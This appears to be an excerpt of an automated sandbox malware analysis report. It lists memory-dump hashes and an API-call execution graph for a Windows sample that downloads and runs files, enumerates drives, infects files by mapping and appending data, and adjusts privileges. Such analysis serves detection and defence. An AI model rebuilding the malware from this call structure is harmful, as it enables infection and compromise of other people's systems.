              • Source File: 00000000.00000002.2193208611.000000000350A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0350A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_350a000_LisectAVT_2403002B_366.jbxd
              Similarity
              • API ID: Initialize
              • String ID:
              • API String ID: 2538663250-0
              • Opcode ID: 4f13c3a2d22ae00b683bb0922741e2b0bfab566f20b81149ede821240fd5661e
              • Instruction ID: b624bf4efa4525c00b275b939664a64fb834ec3bb994dc6d2196e195aef6a1aa
              • Opcode Fuzzy Hash: 4f13c3a2d22ae00b683bb0922741e2b0bfab566f20b81149ede821240fd5661e
              • Instruction Fuzzy Hash: 7901AD758003409FEB10CF55E88576AFBA4EF00224F08C8AADD488F262D376A548CEA2
              APIs
              • SetErrorMode.KERNELBASE(?), ref: 0350AA44
              Memory Dump Source
              • Source File: 00000000.00000002.2193208611.000000000350A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0350A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_350a000_LisectAVT_2403002B_366.jbxd
              Similarity
              • API ID: ErrorMode
              • String ID:
              • API String ID: 2340568224-0
              • Opcode ID: 1d179d4c0a4279c1ef51cd49bca150dbcce172e23e1095c6f302e566c987f5d7
              • Instruction ID: 9a9bbb61fd1c7db221a57281fc7373ad8ef99be9b49f8f4e793b3d88ee7761b7
              • Opcode Fuzzy Hash: 1d179d4c0a4279c1ef51cd49bca150dbcce172e23e1095c6f302e566c987f5d7
              • Instruction Fuzzy Hash: 05F0AF3A9003809FDB20CF15E985761FBA4EF44624F48C4DADD495B7A2D37AA548CEB2
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2194038645.0000000003620000.00000040.00000800.00020000.00000000.sdmp, Offset: 03620000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_3620000_LisectAVT_2403002B_366.jbxd
              Similarity
              • API ID:
              • String ID: 2Ll
              • API String ID: 0-343416306
              • Opcode ID: f98520537f807fd0b8896d91235b820bc99d1a20c6a8314551935211b0d81296
              • Instruction ID: 9880aee8eb96edc773006b45e75da37e7cfd669bd9f5a99d7eaf37ff75453ee7
              • Opcode Fuzzy Hash: f98520537f807fd0b8896d91235b820bc99d1a20c6a8314551935211b0d81296
              • Instruction Fuzzy Hash: 96816B34A00218CFDB14DFB4D855BEDBBB2AF49308F1085A9E40AAB3A4DB759D45CF51
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2194038645.0000000003620000.00000040.00000800.00020000.00000000.sdmp, Offset: 03620000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_3620000_LisectAVT_2403002B_366.jbxd
              Similarity
              • API ID:
              • String ID: 2Ll
              • API String ID: 0-343416306
              • Opcode ID: 5f4374d4bc4118793c26b717ddcf49c9f39c4c008b8240cc32bbca4dc8bb97ad
              • Instruction ID: c8056515404d7c39a415c3b0d603c961e68491377a6923d6c0d791bf2ccaa106
              • Opcode Fuzzy Hash: 5f4374d4bc4118793c26b717ddcf49c9f39c4c008b8240cc32bbca4dc8bb97ad
              • Instruction Fuzzy Hash: 7A419C34A002288FDB14DFB5D855BECBBB1BF49308F0045A9D009AB3A4CB755E49CF61
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2194038645.0000000003620000.00000040.00000800.00020000.00000000.sdmp, Offset: 03620000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_3620000_LisectAVT_2403002B_366.jbxd
              Similarity
              • API ID:
              • String ID: :@%l
              • API String ID: 0-1656731533
              • Opcode ID: f987a56ee651ca79ddbe2043c3258fd1a109db935f8d60e1fee8333273381a83
              • Instruction ID: 8f11e939a72a612b50524cce10b87b130cfa8becd1a2e0b210bd80a903ce66a6
              • Opcode Fuzzy Hash: f987a56ee651ca79ddbe2043c3258fd1a109db935f8d60e1fee8333273381a83
              • Instruction Fuzzy Hash: C931E9747102118FDB04E775D812BBF3BAA9B88308F51802DE405DBBA4DF398D1ACBA1
              APIs
              • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 007A056B
              Memory Dump Source
              • Source File: 00000000.00000002.2189110013.0000000000794000.00000040.00000001.01000000.00000003.sdmp, Offset: 0061C000, based on PE: true
              • Associated: 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2189110013.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2189110013.0000000000773000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2189110013.0000000000778000.00000040.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_600000_LisectAVT_2403002B_366.jbxd
              Similarity
              • API ID: AllocVirtual
              • String ID:
              • API String ID: 4275171209-0
              • Opcode ID: 5cce2fe32572c769e34f5b9ec55552e0fd50e4bbbbc8f4191c5bf5b3274122db
              • Instruction ID: ac9841ba4c67087d41aa773bdd86f2978b9cacdc90dfe7235e6a90837f5ef379
              • Opcode Fuzzy Hash: 5cce2fe32572c769e34f5b9ec55552e0fd50e4bbbbc8f4191c5bf5b3274122db
              • Instruction Fuzzy Hash: 1FE0ECB67001089BDB10CE4DD884F5A33ADA789310F108911F519D7605C239FC609BA5
              Memory Dump Source
              • Source File: 00000000.00000002.2194038645.0000000003620000.00000040.00000800.00020000.00000000.sdmp, Offset: 03620000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_3620000_LisectAVT_2403002B_366.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 29aa5de75eed830bbaea3f53caa19f61e7d35c897af78443bf963936a6a5aac2
              • Instruction ID: ba549bb0395547e490f6be25445e0eac679421070e588d77e7d530404a2d9c19
              • Opcode Fuzzy Hash: 29aa5de75eed830bbaea3f53caa19f61e7d35c897af78443bf963936a6a5aac2
              • Instruction Fuzzy Hash: 7911803644E3C19FD7038B64D8A2A813FB4AF1321474E44EBD090CF1A7D66C690ADB72
              Memory Dump Source
              • Source File: 00000000.00000002.2194038645.0000000003620000.00000040.00000800.00020000.00000000.sdmp, Offset: 03620000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_3620000_LisectAVT_2403002B_366.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5ea3354dee18f4b1e9e50408131e07d5d82efd4c2a1e4ba61328151fc24d5930
              • Instruction ID: 2ac638d2e623463b69096753ae20a13fbf163582a234dadf727003ec39cbb862
              • Opcode Fuzzy Hash: 5ea3354dee18f4b1e9e50408131e07d5d82efd4c2a1e4ba61328151fc24d5930
              • Instruction Fuzzy Hash: 4B118B3421A342CFCB01EB76E5598987BF1FFC5348B48882DE4458F369EB729858DB52
              Memory Dump Source
              • Source File: 00000000.00000002.2194398998.0000000004150000.00000040.00000020.00020000.00000000.sdmp, Offset: 04150000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_4150000_LisectAVT_2403002B_366.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 42c1b762f64ea9db5907554584a5b518f50055176212d1574cc88c1282544ab2
              • Instruction ID: bd392d3d55948cd76e8465a7650947561e9c87cd8ce15f46540600bbcba827fe
              • Opcode Fuzzy Hash: 42c1b762f64ea9db5907554584a5b518f50055176212d1574cc88c1282544ab2
              • Instruction Fuzzy Hash: F401DBB55493805FD701CB15EC40893BFE8DF8623070984AFE8498B612D225B909C771
              Memory Dump Source
              • Source File: 00000000.00000002.2194038645.0000000003620000.00000040.00000800.00020000.00000000.sdmp, Offset: 03620000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_3620000_LisectAVT_2403002B_366.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 566db1601539464f973f03ccb2f4365dae4cdc4d187bb7da280658839a04a234
              • Instruction ID: d2fe2b14d00e15b3ffaf007a65cde43e0667d6d9f9bac3447ac0e6a88eede49d
              • Opcode Fuzzy Hash: 566db1601539464f973f03ccb2f4365dae4cdc4d187bb7da280658839a04a234
              • Instruction Fuzzy Hash: 29F0C832A003046BE704DAB0DC12BAE7BB6EBC1624F1581BEE5459F2D1DA3298458780
              Memory Dump Source
              • Source File: 00000000.00000002.2194398998.0000000004150000.00000040.00000020.00020000.00000000.sdmp, Offset: 04150000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_4150000_LisectAVT_2403002B_366.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3d5e6358b2f1f9eac203391a38597a318d96ed3f63109ef56e1a66756876e7ca
              • Instruction ID: da871a5b08a6104c524331149660b422b2a5ead3dc667dbe86274c242ffbbff7
              • Opcode Fuzzy Hash: 3d5e6358b2f1f9eac203391a38597a318d96ed3f63109ef56e1a66756876e7ca
              • Instruction Fuzzy Hash: F0E09276A006008B9650CF0BFC81452F794EB84630B48C47FDC0D8BB11E276B548CAB5
              Memory Dump Source
              • Source File: 00000000.00000002.2194038645.0000000003620000.00000040.00000800.00020000.00000000.sdmp, Offset: 03620000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_3620000_LisectAVT_2403002B_366.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a0caf57c03b8f29d217f878cfc640a8e2327afd76c7749915c3398a623b13ed2
              • Instruction ID: 0d5449dd82d93dac6f1a53fc7fde5dfaf18a11ea436fe49750d13b2d07828b31
              • Opcode Fuzzy Hash: a0caf57c03b8f29d217f878cfc640a8e2327afd76c7749915c3398a623b13ed2
              • Instruction Fuzzy Hash: E3E08C30246200CFC71A9B34E466C5C3B75AF8630D30808BDD4068B366DA3AE482DB00
              Memory Dump Source
              • Source File: 00000000.00000002.2193183574.0000000003502000.00000040.00000800.00020000.00000000.sdmp, Offset: 03502000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_3502000_LisectAVT_2403002B_366.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b439ef0d786c6807d79a99414da9c3341ae4cb926f6379dfe82888b74eac8423
              • Instruction ID: 68254698e4f1775aafa3d958975b20891a7780488ed97b9c905502a83bc36f53
              • Opcode Fuzzy Hash: b439ef0d786c6807d79a99414da9c3341ae4cb926f6379dfe82888b74eac8423
              • Instruction Fuzzy Hash: A0D05E792066C14FE316DB1CD1A8F9577E4BB51708F4E48F9AC008B7B3C769E981D250
              Memory Dump Source
              • Source File: 00000000.00000002.2193183574.0000000003502000.00000040.00000800.00020000.00000000.sdmp, Offset: 03502000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_3502000_LisectAVT_2403002B_366.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0be51ed8a5e3352b4b2dca852ba0e74e92d9d9f2f9d10071c59dba27dd4fb919
              • Instruction ID: 449c169a84ddd2cb947ded41855f2a419d0b542b1728227ff790d1aae41834b2
              • Opcode Fuzzy Hash: 0be51ed8a5e3352b4b2dca852ba0e74e92d9d9f2f9d10071c59dba27dd4fb919
              • Instruction Fuzzy Hash: 31D05E342015814BDB15DF1CE6D9F9977D4BB40705F0A48E8AC108B7B2C3B5E881CA00
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2189110013.0000000000794000.00000040.00000001.01000000.00000003.sdmp, Offset: 0061C000, based on PE: true
              • Associated: 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2189110013.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2189110013.0000000000773000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2189110013.0000000000778000.00000040.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_600000_LisectAVT_2403002B_366.jbxd
              Similarity
              • API ID:
              • String ID: '$zy${y$|y
              • API String ID: 0-1147786086
              • Opcode ID: 896cb78f5bee27c17d39645ab875cd7cac2b2fc60252073c7a8343890d6e3333
              • Instruction ID: f57fe140beb6ba010d201e66e4741a0137710663b346c630e3ae1905099d5910
              • Opcode Fuzzy Hash: 896cb78f5bee27c17d39645ab875cd7cac2b2fc60252073c7a8343890d6e3333
              • Instruction Fuzzy Hash: 8512F456A0D3D14FEF238B34D8692917FA15DA3364F9D06DAC1C0CB8A3E21CA41AD357

              Execution Graph

              Execution Coverage:32.2%
              Dynamic/Decrypted Code Coverage:10.4%
              Signature Coverage:18.9%
              Total number of Nodes:297
              Total number of Limit Nodes:12
              execution_graph 1014 ae6159 VirtualFree 1022 ae60c7 1014->1022 1015 ae6198 VirtualFree 1024 ae61b2 1015->1024 1016 ae60d5 VirtualAlloc 1016->1022 1017 ae6389 VirtualProtect 1021 ae63b7 1017->1021 1018 ae63fc VirtualProtect 1019 ae6400 1018->1019 1020 ae615f VirtualFree 1020->1022 1021->1018 1023 ae63e7 VirtualProtect 1021->1023 1022->1015 1022->1016 1022->1020 1023->1018 1023->1021 1024->1017 1025 ae62fb 1024->1025 1026 ae6076 1027 ae607b 1026->1027 1031 ae60c7 1026->1031 1029 ae60b0 VirtualAlloc 1027->1029 1027->1031 1038 ae61b2 1027->1038 1028 ae615f VirtualFree 1028->1031 1029->1031 1030 ae6198 VirtualFree 1030->1038 1031->1028 1031->1030 1032 ae60d5 VirtualAlloc 1031->1032 1032->1031 1033 ae6389 VirtualProtect 1036 ae63b7 1033->1036 1034 ae63fc VirtualProtect 1035 ae6400 1034->1035 1036->1034 1037 ae63e7 VirtualProtect 1036->1037 1037->1034 1037->1036 1038->1033 1039 ae62fb 1038->1039 1343 ae6014 1344 ae6035 GetModuleHandleA 1343->1344 1345 ae605f 1343->1345 1346 ae604d GetProcAddress 1344->1346 1347 ae6058 1346->1347 1347->1345 1347->1346 1347->1347 1040 ae14e1 1041 ae14fd GetModuleHandleA 1040->1041 1042 ae1541 1040->1042 1045 ae151a VirtualQuery 1041->1045 1046 ae1512 1041->1046 1043 ae1549 1042->1043 1044 ae1573 1042->1044 1047 ae1566 1043->1047 1068 ae1af9 1043->1068 1051 ae1638 GetTempPathA GetSystemDirectoryA GetModuleFileNameA 1044->1051 1045->1046 1046->1042 1049 ae1579 ExitProcess 1052 ae167f 1051->1052 1053 ae167a 1051->1053 1074 ae1718 GetSystemTimeAsFileTime 1052->1074 1086 ae139f GetVersionExA 1053->1086 1056 ae1686 1057 ae16ca 1056->1057 1060 ae16a0 CreateThread 1056->1060 1058 ae16d7 1057->1058 1059 ae16d0 1057->1059 1062 ae170f 1058->1062 1063 ae16dd lstrcpy 1058->1063 1107 ae1581 1059->1107 1079 ae2c48 memset 1060->1079 1323 ae1099 1060->1323 1062->1049 1063->1049 1067 ae1718 3 API calls 1067->1057 1069 ae1b09 1068->1069 1070 ae1b11 1068->1070 1071 ae1638 188 API calls 1069->1071 1072 ae1b16 CreateThread 1070->1072 1073 ae1b0f 1070->1073 1071->1073 1072->1073 1342 ae1638 189 API calls 1072->1342 1073->1047 1073->1073 1075 ae1754 1074->1075 1076 ae1735 SHSetValueA 1074->1076 1077 ae175a SHGetValueA 1075->1077 1078 ae1786 __aulldiv 1075->1078 1076->1078 1077->1078 1078->1056 1113 ae1973 PathFileExistsA 1079->1113 1082 ae2cb2 1084 ae2cbb VirtualFree 1082->1084 1085 ae16ba WaitForSingleObject 1082->1085 1083 ae2c8f CreateThread WaitForMultipleObjects 1083->1082 1135 ae2b8c memset GetLogicalDriveStringsA 1083->1135 1084->1085 1085->1067 1087 ae13cf LookupPrivilegeValueA 1086->1087 1088 ae14da 1086->1088 1089 ae13e7 1087->1089 1090 ae13ef 1087->1090 1088->1052 1303 ae119f GetCurrentProcess OpenProcessToken 1089->1303 1090->1088 1308 ae120e GetModuleHandleA GetProcAddress 1090->1308 1096 ae1448 GetCurrentProcessId 1096->1088 1097 ae1457 1096->1097 1097->1088 1098 ae1319 3 API calls 1097->1098 1099 ae147f 1098->1099 1100 ae1319 3 API calls 1099->1100 1101 ae148e 1100->1101 1101->1088 1102 ae1319 3 API calls 1101->1102 1103 ae14b4 1102->1103 1104 ae1319 3 API calls 1103->1104 1105 ae14c3 1104->1105 1106 ae1319 3 API calls 1105->1106 1106->1088 1322 ae185b GetSystemTimeAsFileTime srand rand srand rand 1107->1322 1109 ae1592 wsprintfA wsprintfA lstrlen CreateFileA 1110 ae15fb WriteFile CloseHandle 1109->1110 1111 ae1633 1109->1111 1110->1111 1112 ae161d ShellExecuteA 1110->1112 1111->1062 1112->1111 1114 ae19a0 1113->1114 1115 ae1ac7 1113->1115 1116 ae19af CreateFileA 1114->1116 1115->1082 1115->1083 1117 ae1a28 GetFileSize 1116->1117 1118 ae19c4 Sleep 1116->1118 1119 ae1a38 1117->1119 1130 ae1a80 1117->1130 1118->1116 1120 ae19d5 1118->1120 1121 ae1a3d VirtualAlloc 1119->1121 1119->1130 1134 ae185b GetSystemTimeAsFileTime srand rand srand rand 1120->1134 1125 ae1a53 1121->1125 1121->1130 1122 ae1a8d FindCloseChangeNotification 1123 ae1a96 1122->1123 1126 ae1a9c DeleteFileA 1123->1126 1127 ae1aad 1123->1127 1129 ae1a59 ReadFile 1125->1129 1125->1130 1126->1127 1127->1115 1133 ae1ab8 VirtualFree 1127->1133 1128 ae19da wsprintfA CopyFileA 1128->1117 1132 ae1a0d CreateFileA 1128->1132 1129->1125 1129->1130 1130->1122 1130->1123 1132->1117 1132->1126 1133->1115 1134->1128 1136 ae2bc8 1135->1136 1137 ae2c09 WaitForMultipleObjects 1135->1137 1140 ae2bfa lstrlen 1136->1140 1141 ae2bd2 GetDriveTypeA 1136->1141 1142 ae2be3 CreateThread 1136->1142 1138 ae2c3c 1137->1138 1139 ae2c2a CreateThread 1137->1139 1139->1138 1146 ae2845 1139->1146 1140->1136 1140->1137 1141->1136 1141->1140 1142->1140 1143 ae2b7d 1142->1143 1156 ae29e2 memset wsprintfA 1143->1156 1293 ae274a memset memset SHGetSpecialFolderPathA wsprintfA 1146->1293 1148 ae2878 DeleteFileA 1149 ae288c VirtualFree 1148->1149 1150 ae289a 1148->1150 1149->1150 1152 ae28ab 1150->1152 1153 ae28a4 CloseHandle 1150->1153 1151 ae2692 8 API calls 1154 ae2853 1151->1154 1153->1152 1154->1148 1154->1151 1155 ae239d 186 API calls 1154->1155 1155->1154 1157 ae2abc memset memset FindFirstFileA 1156->1157 1158 ae2a3a memset lstrlen lstrcpyn strrchr 1156->1158 1170 ae28b8 memset wsprintfA 1157->1170 1158->1157 1159 ae2a88 1158->1159 1159->1157 1161 ae2a9a lstrcmpiA 1159->1161 1163 ae2aad lstrlen 1161->1163 1164 ae2b74 1161->1164 1163->1157 1163->1161 1165 ae2b61 FindNextFileA 1166 ae2b6d FindClose 1165->1166 1167 ae2b23 1165->1167 1166->1164 1168 ae2b35 lstrcmpiA 1167->1168 1169 ae28b8 174 API calls 1167->1169 1168->1166 1168->1167 1169->1165 1171 ae2905 1170->1171 1176 ae2951 memset 1170->1176 1172 ae291b memset wsprintfA 1171->1172 1173 ae2956 strrchr 1171->1173 1171->1176 1174 ae29e2 180 API calls 1172->1174 1175 ae2967 lstrcmpiA 1173->1175 1173->1176 1174->1176 1177 ae297a 1175->1177 1178 ae2988 lstrcmpiA 1175->1178 1176->1165 1188 ae1e6e 1177->1188 1178->1176 1180 ae2994 1178->1180 1181 ae29ad strstr 1180->1181 1182 ae29a5 lstrcpy 1180->1182 1183 ae29cb 1181->1183 1184 ae29d3 1181->1184 1182->1181 1231 ae239d strstr 1183->1231 1253 ae2692 1184->1253 1189 ae1e7d 1188->1189 1262 ae1df6 strrchr 1189->1262 1192 ae2332 1196 ae233d UnmapViewOfFile 1192->1196 1197 ae2346 1192->1197 1193 ae1eb0 SetFileAttributesA CreateFileA 1193->1192 1194 ae1edf 1193->1194 1267 ae1915 1194->1267 1196->1197 1199 ae234b FindCloseChangeNotification 1197->1199 1200 ae2350 1197->1200 1199->1200 1201 ae2356 CloseHandle 1200->1201 1202 ae2391 1200->1202 1201->1202 1202->1176 1203 ae1f2e 1203->1192 1273 ae1c81 1203->1273 1207 ae1f92 1208 ae1c81 2 API calls 1207->1208 1209 ae1f9f 1208->1209 1209->1192 1210 ae1af9 169 API calls 1209->1210 1211 ae2024 1209->1211 1215 ae1fc0 1210->1215 1211->1192 1212 ae1af9 169 API calls 1211->1212 1213 ae207a 1212->1213 1214 ae1af9 169 API calls 1213->1214 1219 ae2090 1214->1219 1215->1192 1215->1211 1216 ae1af9 169 API calls 1215->1216 1217 ae1ffe 1216->1217 1218 ae2013 FlushViewOfFile 1217->1218 1218->1211 1220 ae20bb memset memset 1219->1220 1221 ae20f5 1220->1221 1222 ae1c81 2 API calls 1221->1222 1223 ae21de 1222->1223 1224 ae2226 memcpy UnmapViewOfFile FindCloseChangeNotification 1223->1224 1278 ae1b8a 1224->1278 1226 ae226e 1286 ae185b GetSystemTimeAsFileTime srand rand srand rand 1226->1286 1228 ae22ab SetFilePointer SetEndOfFile SetFilePointer WriteFile WriteFile 1229 ae1915 3 API calls 1228->1229 1230 ae231f FindCloseChangeNotification 1229->1230 1230->1192 1232 ae23d8 1231->1232 1233 ae2451 CreateFileA GetFileSize 1231->1233 1232->1233 1238 ae2687 1232->1238 1234 ae2675 CloseHandle 1233->1234 1235 ae2480 1233->1235 1236 ae267c RemoveDirectoryA 1234->1236 1235->1234 1237 ae2499 1235->1237 1236->1238 1239 ae1915 3 API calls 1237->1239 1238->1176 1240 ae24a4 9 API calls 1239->1240 1288 ae189d memset CreateProcessA 1240->1288 1243 ae255c Sleep memset wsprintfA 1244 ae29e2 163 API calls 1243->1244 1245 ae2597 memset wsprintfA Sleep 1244->1245 1246 ae189d 6 API calls 1245->1246 1247 ae25e4 Sleep CreateFileA 1246->1247 1248 ae1915 3 API calls 1247->1248 1249 ae2610 CloseHandle 1248->1249 1249->1236 1250 ae261e 1249->1250 1250->1236 1251 ae2641 SetFilePointer WriteFile 1250->1251 1251->1236 1252 ae2667 SetEndOfFile 1251->1252 1252->1236 1254 ae26b2 WaitForSingleObject 1253->1254 1255 ae26a2 CreateEventA 1253->1255 1256 ae2708 1254->1256 1257 ae26c1 lstrlen ??2@YAPAXI 1254->1257 1255->1254 1259 ae2736 SetEvent 1256->1259 1260 ae2718 lstrcpy ??3@YAXPAX 1256->1260 1258 ae26da lstrcpy 1257->1258 1257->1259 1261 ae26f1 1258->1261 1259->1176 1260->1261 1261->1259 1263 ae1e62 1262->1263 1264 ae1e13 lstrcpy strrchr 1262->1264 1263->1192 1263->1193 1264->1263 1265 ae1e40 lstrcmpiA 1264->1265 1265->1263 1266 ae1e52 lstrlen 1265->1266 1266->1263 1266->1265 1268 ae1928 1267->1268 1269 ae1924 SetFilePointer CreateFileMappingA MapViewOfFile 1267->1269 1270 ae192e memset GetFileTime 1268->1270 1271 ae194f 1268->1271 1269->1192 1269->1203 1270->1269 1271->1269 1272 ae1954 SetFileTime 1271->1272 1272->1269 1274 ae1c9c 1273->1274 1276 ae1c94 1273->1276 1275 ae1cae memset memset 1274->1275 1274->1276 1275->1276 1276->1192 1277 ae185b GetSystemTimeAsFileTime srand rand srand rand 1276->1277 1277->1207 1279 ae1b93 1278->1279 1287 ae185b GetSystemTimeAsFileTime srand rand srand rand 1279->1287 1281 ae1bca srand 1282 ae1bd8 rand 1281->1282 1283 ae1c08 1282->1283 1283->1282 1284 ae1c29 memset memcpy lstrcat 1283->1284 1284->1226 1286->1228 1287->1281 1289 ae190c 1288->1289 1290 ae18e0 CloseHandle WaitForSingleObject 1288->1290 1289->1236 1289->1243 1291 ae18fb GetExitCodeProcess 1290->1291 1292 ae1907 CloseHandle 1290->1292 1291->1292 1292->1289 1302 ae185b GetSystemTimeAsFileTime srand rand srand rand 1293->1302 1295 ae27b5 wsprintfA CopyFileA 1296 ae27de wsprintfA 1295->1296 1297 ae2840 1295->1297 1298 ae1973 17 API calls 1296->1298 1297->1154 1299 ae280f 1298->1299 1300 ae2813 DeleteFileA 1299->1300 1301 ae2820 CreateFileA 1299->1301 1300->1301 1301->1297 1302->1295 1304 ae11c6 AdjustTokenPrivileges 1303->1304 1305 ae1200 CloseHandle 1303->1305 1306 ae11f6 1304->1306 1307 ae11f7 CloseHandle 1304->1307 1305->1090 1306->1307 1307->1305 1309 ae123f GetCurrentProcessId OpenProcess 1308->1309 1310 ae1310 1308->1310 1309->1310 1312 ae1262 1309->1312 1310->1088 1317 ae1319 1310->1317 1311 ae12b0 VirtualAlloc 1311->1312 1315 ae12b8 1311->1315 1312->1311 1313 ae12f1 CloseHandle 1312->1313 1312->1315 1316 ae1296 VirtualFree 1312->1316 1313->1310 1314 ae1302 VirtualFree 1313->1314 1314->1310 1315->1313 1316->1311 1318 ae134a 1317->1318 1319 ae132a GetModuleHandleA GetProcAddress 1317->1319 1320 ae1351 memset 1318->1320 1321 ae1363 1318->1321 1319->1318 1319->1321 1320->1321 1321->1088 1321->1096 1322->1109 1324 ae1196 1323->1324 1325 ae10ba 1323->1325 1325->1324 1341 ae185b GetSystemTimeAsFileTime srand rand srand rand 1325->1341 1327 ae1118 wsprintfA wsprintfA URLDownloadToFileA 1328 ae10dc 1327->1328 1329 ae1168 lstrlen Sleep 1327->1329 1332 ae1000 CreateFileA 1328->1332 1329->1325 1333 ae1025 GetFileSize CreateFileMappingA MapViewOfFile 1332->1333 1334 ae1092 WinExec lstrlen 1332->1334 1335 ae107b 1333->1335 1336 ae1057 1333->1336 1334->1324 1334->1325 1339 ae108d CloseHandle 1335->1339 1340 ae1087 CloseHandle 1335->1340 1337 ae1074 UnmapViewOfFile 1336->1337 1338 ae1061 1336->1338 1337->1335 1338->1337 1339->1334 1340->1339 1341->1327 1348 ae2361 1349 ae236b UnmapViewOfFile 1348->1349 1350 ae2374 1348->1350 1349->1350 1351 ae2379 CloseHandle 1350->1351 1352 ae2382 1350->1352 1351->1352 1353 ae2388 CloseHandle 1352->1353 1354 ae2391 1352->1354 1353->1354

              Callgraph

              • Executed
              • Not Executed
              • Opacity -> Relevance
              • Disassembly available
              callgraph 0 Function_00AE65A6 1 Function_00AE67A4 2 Function_00AE28B8 22 Function_00AE239D 2->22 30 Function_00AE2692 2->30 32 Function_00AE1E6E 2->32 34 Function_00AE29E2 2->34 3 Function_00AE1638 19 Function_00AE1581 3->19 21 Function_00AE139F 3->21 25 Function_00AE1718 3->25 26 Function_00AE1099 3->26 48 Function_00AE2C48 3->48 54 Function_00AE17D0 3->54 4 Function_00AE6834 5 Function_00AE6734 13 Function_00AE6A84 5->13 14 Function_00AE6B02 5->14 16 Function_00AE6D00 5->16 6 Function_00AE69B0 7 Function_00AE120E 8 Function_00AE680F 9 Function_00AE2B8C 39 Function_00AE2B7D 9->39 50 Function_00AE2845 9->50 10 Function_00AE1D8A 11 Function_00AE1B8A 52 Function_00AE185B 11->52 12 Function_00AE600A 13->8 44 Function_00AE6CF2 13->44 35 Function_00AE6B63 14->35 15 Function_00AE1000 15->54 16->6 16->35 16->44 17 Function_00AE6001 17->12 18 Function_00AE1C81 19->52 20 Function_00AE119F 21->7 21->20 27 Function_00AE1319 21->27 23 Function_00AE189D 22->23 29 Function_00AE1915 22->29 22->34 24 Function_00AE2D9B 46 Function_00AE2CF0 25->46 26->15 26->52 28 Function_00AE6014 31 Function_00AE6012 32->10 32->11 32->18 32->24 32->29 33 Function_00AE1C68 32->33 36 Function_00AE2D60 32->36 41 Function_00AE1AF9 32->41 43 Function_00AE1DF6 32->43 32->52 34->2 35->1 35->4 35->6 37 Function_00AE14E1 37->3 37->41 38 Function_00AE2361 38->24 39->34 40 Function_00AE6CF8 41->3 42 Function_00AE6076 49 Function_00AE66C8 42->49 44->40 45 Function_00AE1973 45->52 47 Function_00AE274A 47->45 47->52 48->9 48->45 49->13 49->14 49->16 50->22 50->30 50->47 51 Function_00AE235D 53 Function_00AE6159 53->49

              Control-flow Graph

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd
              Similarity
              • API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
              • String ID: %s*$C:\$Documents and Settings
              • API String ID: 2826467728-110786608
              • Opcode ID: ea21193cb2fb46b61ff78d3c82b7b20929feff1d27eee4ca1b7885b673692615
              • Instruction ID: 37b4cc911b10a53ef366d25f55d55c9994b809b3428a99be22c0445809fe3d6a
              • Opcode Fuzzy Hash: ea21193cb2fb46b61ff78d3c82b7b20929feff1d27eee4ca1b7885b673692615
              • Instruction Fuzzy Hash: 7C4154B3804389AFDB20DBE1DC89EEB77ACEB84315F040929F544D7111E634DA5987A2

              Control-flow Graph

              • Executed
              • Not Executed
